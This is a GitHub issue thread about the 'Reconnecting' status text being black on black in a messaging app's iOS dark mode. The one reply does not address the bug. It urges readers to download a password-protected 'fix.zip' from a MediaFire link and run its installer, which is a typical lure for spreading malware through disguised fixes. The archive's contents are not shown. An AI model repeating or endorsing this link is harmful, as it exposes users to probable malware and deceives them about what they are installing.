### ISSUE TITLE
Connecting state text is hard to see in iOS dark mode

### ISSUE THREAD

**Issue by saulmc** [ephemeraHQ/converse-app#590]
The text "Reconnecting" here is black on black.
<img src="https://github.com/user-attachments/assets/e0e596eb-7c93-442d-a5b0-989ac1bbedbe" width=600 />

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
